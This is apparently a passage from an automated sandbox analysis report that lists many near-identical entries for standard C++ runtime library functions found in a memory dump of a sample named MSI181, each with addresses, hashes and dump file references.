std::_Lockit::~_Lockit.LIBCPMT ref: 0059237C

Strings

2Z, xrefs: 00592369

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID: 2Z
API String ID: 2854358121-2484645983
Opcode ID: 63973eb609fd80e009620d371b435bb695e45fb7ab707815594670b76d1be45a
Instruction ID: edd072a8e4a6d81b205be39bed80a5c6b55cfa40774faf11799d3c23f0d98093
Opcode Fuzzy Hash: 63973eb609fd80e009620d371b435bb695e45fb7ab707815594670b76d1be45a
Instruction Fuzzy Hash: 7C01A13590011ADFCF10ABA49809ABDBFB5BFC4720F24090AF410AB2D1DF349E059BA1

Uniqueness

Uniqueness Score: -1.00%

Function 0058D6BD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0058D6C4
std::_Lockit::_Lockit.LIBCPMT ref: 0058D6CE

Part of subcall function 00588C20: std::_Lockit::_Lockit.LIBCPMT ref: 00588C50
Part of subcall function 00588C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00588C78

std::_Facet_Register.LIBCPMT ref: 0058D71F
std::_Lockit::~_Lockit.LIBCPMT ref: 0058D73F

Strings

2Z, xrefs: 0058D72C

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID: 2Z
API String ID: 2854358121-2484645983
Opcode ID: 991f003cb09bac7a37efe48bd3f8239011672142ce9b2c22b5f43f5ea9c93b30
Instruction ID: 1f9d1215d1eaf5f77b58fde4c40cd3c0083ef094fbba27dea647600de65fa973
Opcode Fuzzy Hash: 991f003cb09bac7a37efe48bd3f8239011672142ce9b2c22b5f43f5ea9c93b30
Instruction Fuzzy Hash: 5E018E359001169FCB15BBA498097BE7FB1FFD4710F25080AE800BB2D2CF349E0187A0

Uniqueness

Uniqueness Score: -1.00%

Function 0058D752 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0058D759
std::_Lockit::_Lockit.LIBCPMT ref: 0058D763

Part of subcall function 00588C20: std::_Lockit::_Lockit.LIBCPMT ref: 00588C50
Part of subcall function 00588C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00588C78

std::_Facet_Register.LIBCPMT ref: 0058D7B4
std::_Lockit::~_Lockit.LIBCPMT ref: 0058D7D4

Strings

2Z, xrefs: 0058D7C1

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID: 2Z
API String ID: 2854358121-2484645983
Opcode ID: 15c02d0d46b6393f859726d479a5ebfb03a83fdf6be18cd709f9029f7c1dfe73
Instruction ID: d0525f2b10f2de903ac9c7ccea46515315c7879b089f91a8b96ccb631f64e84c
Opcode Fuzzy Hash: 15c02d0d46b6393f859726d479a5ebfb03a83fdf6be18cd709f9029f7c1dfe73
Instruction Fuzzy Hash: 34018E359001169FCB14FBA488497BE7FB5FF84710F24080AE815BB2D1DF349E0087A0

Uniqueness

Uniqueness Score: -1.00%

Function 0059270D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00592714
std::_Lockit::_Lockit.LIBCPMT ref: 0059271E

Part of subcall function 00588C20: std::_Lockit::_Lockit.LIBCPMT ref: 00588C50
Part of subcall function 00588C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00588C78

std::_Facet_Register.LIBCPMT ref: 0059276F
std::_Lockit::~_Lockit.LIBCPMT ref: 0059278F

Strings

2Z, xrefs: 0059277C

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID: 2Z
API String ID: 2854358121-2484645983
Opcode ID: 2830ab6cd45678cd397c052616238111221444656851b4e4ca29ec742cbdaf30
Instruction ID: 37d8eea63731c1c21c23fe231aabc3db627128871081dca44c01dfc5341aef96
Opcode Fuzzy Hash: 2830ab6cd45678cd397c052616238111221444656851b4e4ca29ec742cbdaf30
Instruction Fuzzy Hash: D601A13590011AEFCF14ABA48849ABEBFB1FFD4710F24090AF8107B292CF349E058B90

Uniqueness

Uniqueness Score: -1.00%

Function 0058D7E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0058D7EE
std::_Lockit::_Lockit.LIBCPMT ref: 0058D7F8

Part of subcall function 00588C20: std::_Lockit::_Lockit.LIBCPMT ref: 00588C50
Part of subcall function 00588C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00588C78

std::_Facet_Register.LIBCPMT ref: 0058D849
std::_Lockit::~_Lockit.LIBCPMT ref: 0058D869

Strings

2Z, xrefs: 0058D856

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID: 2Z
API String ID: 2854358121-2484645983
Opcode ID: 59796a6d1a0bc2f2c959d34d24b5cb4464096b89d13b3efea7516d7017f0e682
Instruction ID: 31199ccf1b797c42ab4e638fffcee03d1c8c45030631d134f80bfe1ee0969eff
Opcode Fuzzy Hash: 59796a6d1a0bc2f2c959d34d24b5cb4464096b89d13b3efea7516d7017f0e682
Instruction Fuzzy Hash: 61018E359001169FCB14FBA498496BE7FB1FF94720F24044AE8017B2D1DF349E018BA1

Uniqueness

Uniqueness Score: -1.00%

Function 005927A2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 005927A9
std::_Lockit::_Lockit.LIBCPMT ref: 005927B3

Part of subcall function 00588C20: std::_Lockit::_Lockit.LIBCPMT ref: 00588C50
Part of subcall function 00588C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00588C78

std::_Facet_Register.LIBCPMT ref: 00592804
std::_Lockit::~_Lockit.LIBCPMT ref: 00592824

Strings

2Z, xrefs: 00592811

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID: 2Z
API String ID: 2854358121-2484645983
Opcode ID: 8b544d48fa06e6614d477a8522f8914d9b70dde1d8fc9044ee2672b62a46151f
Instruction ID: 621cde2e4d06314548eb6e0a1768e66ba9956f5eaba85de94237fad78a14e347
Opcode Fuzzy Hash: 8b544d48fa06e6614d477a8522f8914d9b70dde1d8fc9044ee2672b62a46151f
Instruction Fuzzy Hash: 7701A1359002169FCF15ABA4C8096BD7FB5BFC4720F24080AF8016B292DF309E05DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00592837 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0059283E
std::_Lockit::_Lockit.LIBCPMT ref: 00592848

Part of subcall function 00588C20: std::_Lockit::_Lockit.LIBCPMT ref: 00588C50
Part of subcall function 00588C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00588C78

std::_Facet_Register.LIBCPMT ref: 00592899
std::_Lockit::~_Lockit.LIBCPMT ref: 005928B9

Strings

2Z, xrefs: 005928A6

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID: 2Z
API String ID: 2854358121-2484645983
Opcode ID: 609acd52596c593c3bb8b6abef1da0399e9e94b6d10597ecc464f580737470a5
Instruction ID: f962b7453cd9d83cfe9900cb6ad4afa2ebe465561d3de6f90bc8dcb7e962e3df
Opcode Fuzzy Hash: 609acd52596c593c3bb8b6abef1da0399e9e94b6d10597ecc464f580737470a5
Instruction Fuzzy Hash: D501A17590021AEFCF14EBA4C819ABD7FB5BFD4720F24090AF411AB292DF309E058B91

Uniqueness

Uniqueness Score: -1.00%

Function 005928CC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 005928D3
std::_Lockit::_Lockit.LIBCPMT ref: 005928DD

Part of subcall function 00588C20: std::_Lockit::_Lockit.LIBCPMT ref: 00588C50
Part of subcall function 00588C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00588C78

std::_Facet_Register.LIBCPMT ref: 0059292E
std::_Lockit::~_Lockit.LIBCPMT ref: 0059294E

Strings

2Z, xrefs: 0059293B

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID: 2Z
API String ID: 2854358121-2484645983
Opcode ID: 5a6c5570a8c3782d69d82c04ab32c60ae19e1f7530f45d0296a48542bef0dc24
Instruction ID: 65812fe89b06f60ebb61d3a7c8fe448e907a141a6f1d5808e161da9623d36b9c
Opcode Fuzzy Hash: 5a6c5570a8c3782d69d82c04ab32c60ae19e1f7530f45d0296a48542bef0dc24
Instruction Fuzzy Hash: 8701C435901216DFCF11EBA48819ABE7FB5BFC4720F14080AF8116B2D2CF749E459790

Uniqueness

Uniqueness Score: -1.00%

Function 0059E96D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0059E974
std::_Lockit::_Lockit.LIBCPMT ref: 0059E97E

Part of subcall function 00588C20: std::_Lockit::_Lockit.LIBCPMT ref: 00588C50
Part of subcall function 00588C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00588C78

std::_Facet_Register.LIBCPMT ref: 0059E9CF
std::_Lockit::~_Lockit.LIBCPMT ref: 0059E9EF

Strings

2Z, xrefs: 0059E9DC

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID: 2Z
API String ID: 2854358121-2484645983
Opcode ID: fbfbebc212e913f9f6e86702ff49827dee3fc7364837f2bfdf2cd37bc1946c4e
Instruction ID: a5e186466d7a454d4d4f4c35af78d33604a0d14c68868a149624f8517d2e13d1
Opcode Fuzzy Hash: fbfbebc212e913f9f6e86702ff49827dee3fc7364837f2bfdf2cd37bc1946c4e
Instruction Fuzzy Hash: D501C435900116DFCF15EBA4884A6BE7FB5BFC4710F25080AF4106B2D1CF309E009791

Uniqueness

Uniqueness Score: -1.00%

Function 0059EA02 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0059EA09
std::_Lockit::_Lockit.LIBCPMT ref: 0059EA13

Part of subcall function 00588C20: std::_Lockit::_Lockit.LIBCPMT ref: 00588C50
Part of subcall function 00588C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00588C78

std::_Facet_Register.LIBCPMT ref: 0059EA64
std::_Lockit::~_Lockit.LIBCPMT ref: 0059EA84

Strings

2Z, xrefs: 0059EA71

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID: 2Z
API String ID: 2854358121-2484645983
Opcode ID: ff038a52c33b4ced2b195efe48acb38ee97436d0c3e81bde8f6e62c882067594
Instruction ID: 2e3917591ad16516e04a452c97b197d391209289a12f9892a602948013a01099
Opcode Fuzzy Hash: ff038a52c33b4ced2b195efe48acb38ee97436d0c3e81bde8f6e62c882067594
Instruction Fuzzy Hash: 9A01A13590011A9FCF10EBA4885A6BD7FB1BFD4710F25080AF4016B291DF349E01C791

Uniqueness

Uniqueness Score: -1.00%

Function 0059EBC1 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0059EBC8
std::_Lockit::_Lockit.LIBCPMT ref: 0059EBD2

Part of subcall function 00588C20: std::_Lockit::_Lockit.LIBCPMT ref: 00588C50
Part of subcall function 00588C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00588C78

std::_Facet_Register.LIBCPMT ref: 0059EC23
std::_Lockit::~_Lockit.LIBCPMT ref: 0059EC43

Strings

2Z, xrefs: 0059EC30

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID: 2Z
API String ID: 2854358121-2484645983
Opcode ID: da877b5339a046421aef13dd6a05e1c1b735e00e44941ce136d2315ac7272bdb
Instruction ID: 8c5e184b2ee6d6076e4ae0638485ad7e4f12d4851530bf3d5f26cb9b8c72bddc
Opcode Fuzzy Hash: da877b5339a046421aef13dd6a05e1c1b735e00e44941ce136d2315ac7272bdb
Instruction Fuzzy Hash: 8101C43590011ADFCF15EBA4880A6BE7FB5BFD4710F14080AF411AB2D1DF34AE018B91

Uniqueness

Uniqueness Score: -1.00%

Function 00592BB5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00592BBC
std::_Lockit::_Lockit.LIBCPMT ref: 00592BC6

Part of subcall function 00588C20: std::_Lockit::_Lockit.LIBCPMT ref: 00588C50
Part of subcall function 00588C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00588C78

std::_Facet_Register.LIBCPMT ref: 00592C17
std::_Lockit::~_Lockit.LIBCPMT ref: 00592C37

Strings

2Z, xrefs: 00592C24

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID: 2Z
API String ID: 2854358121-2484645983
Opcode ID: cfec42d475f96d2619b02e85daf7d9958d241debcbce3057b9d1a78cd99f390e
Instruction ID: ea7f2219ef886d05e0da4f6dfbffff99b7ace22b06cd937517dade8f572e92d1
Opcode Fuzzy Hash: cfec42d475f96d2619b02e85daf7d9958d241debcbce3057b9d1a78cd99f390e
Instruction Fuzzy Hash: 6501AD3590111AEFCF14EBA49809ABEBFB1BFD4710F24080AF8006B291CF349E05DB90

Uniqueness

Uniqueness Score: -1.00%

Function 0059EC56 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0059EC5D
std::_Lockit::_Lockit.LIBCPMT ref: 0059EC67

Part of subcall function 00588C20: std::_Lockit::_Lockit.LIBCPMT ref: 00588C50
Part of subcall function 00588C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00588C78

std::_Facet_Register.LIBCPMT ref: 0059ECB8
std::_Lockit::~_Lockit.LIBCPMT ref: 0059ECD8

Strings

2Z, xrefs: 0059ECC5

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID: 2Z
API String ID: 2854358121-2484645983
Opcode ID: 6b093aea7923ce8ae9bf31edced1ea005c6936a716bb8d07746a7e481228b782
Instruction ID: b9573e582e8ef060cc85a85e56fc6734d4c5e05f3df51f32d2c76b6efe169978
Opcode Fuzzy Hash: 6b093aea7923ce8ae9bf31edced1ea005c6936a716bb8d07746a7e481228b782
Instruction Fuzzy Hash: 84018B3590011ADFCF15EBA4885AAAE7FB1BFC4720F24080AF401AB291DF34AE419B91

Uniqueness

Uniqueness Score: -1.00%

Function 00592C4A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00592C51
std::_Lockit::_Lockit.LIBCPMT ref: 00592C5B

Part of subcall function 00588C20: std::_Lockit::_Lockit.LIBCPMT ref: 00588C50
Part of subcall function 00588C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00588C78

std::_Facet_Register.LIBCPMT ref: 00592CAC
std::_Lockit::~_Lockit.LIBCPMT ref: 00592CCC

Strings

2Z, xrefs: 00592CB9

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID: 2Z
API String ID: 2854358121-2484645983
Opcode ID: a5c29c241f24af8da16989a0af4e9e98652681e3eea9deb79a5c7e63a978c54e
Instruction ID: 7148c27cb372c9b5d2d5e1b1126d947b0aaf78b9667f6db81447e24d3f025400
Opcode Fuzzy Hash: a5c29c241f24af8da16989a0af4e9e98652681e3eea9deb79a5c7e63a978c54e
Instruction Fuzzy Hash: 3901AD3590111AEFCF11EBA49809ABE7FB5BFC4710F24080AF8116B291CF749E019BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00592CDF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00592CE6
std::_Lockit::_Lockit.LIBCPMT ref: 00592CF0

Part of subcall function 00588C20: std::_Lockit::_Lockit.LIBCPMT ref: 00588C50
Part of subcall function 00588C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00588C78

std::_Facet_Register.LIBCPMT ref: 00592D41
std::_Lockit::~_Lockit.LIBCPMT ref: 00592D61

Strings

2Z, xrefs: 00592D4E

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID: 2Z
API String ID: 2854358121-2484645983
Opcode ID: cf8a5454f56143f1bd196381c9b1a6a9c20ec2648a3d2d9fa8cc96dc9b088acb
Instruction ID: e8a4e624357f43d1d9a9c80bf13868be78527c270694d4e566e75f813b069a67
Opcode Fuzzy Hash: cf8a5454f56143f1bd196381c9b1a6a9c20ec2648a3d2d9fa8cc96dc9b088acb
Instruction Fuzzy Hash: 8801A13590021A9FCF15ABA49849ABD7FB1BFC4720F14050AF4007B2D1DF719E069B91

Uniqueness

Uniqueness Score: -1.00%

Function 00592E09 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00592E10
std::_Lockit::_Lockit.LIBCPMT ref: 00592E1A

Part of subcall function 00588C20: std::_Lockit::_Lockit.LIBCPMT ref: 00588C50
Part of subcall function 00588C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00588C78

std::_Facet_Register.LIBCPMT ref: 00592E6B
std::_Lockit::~_Lockit.LIBCPMT ref: 00592E8B

Strings

2Z, xrefs: 00592E78

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
String ID: 2Z
API String ID: 2854358121-2484645983
Opcode ID: faefd51c0d3e696d4981fb7ada1f59d511b4fbccf8be91aca9160940302ec8d2
Instruction ID: adf84eb3fa4b46d08ccc11552ca07736349a8fdfba39841e8454dae63d0364a3
Opcode Fuzzy Hash: faefd51c0d3e696d4981fb7ada1f59d511b4fbccf8be91aca9160940302ec8d2
Instruction Fuzzy Hash: 0401AD3690011AAFCF10EBA4D849ABEBFB5BFD4710F24090AF8106B291DF349E059B91

Uniqueness

Uniqueness Score: -1.00%

Function 00592E9E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00592EA5
std::_Lockit::_Lockit.LIBCPMT ref: 00592EAF

Part of subcall function 00588C20: std::_Lockit::_Lockit.LIBCPMT ref: 00588C50
Part of subcall function 00588C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00588C78

std::_Facet_Register.LIBCPMT ref: 00592F00
std::_Lockit::~_Lockit.LIBCPMT ref: 00592F20

Strings

2Z, xrefs: 00592F0D

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
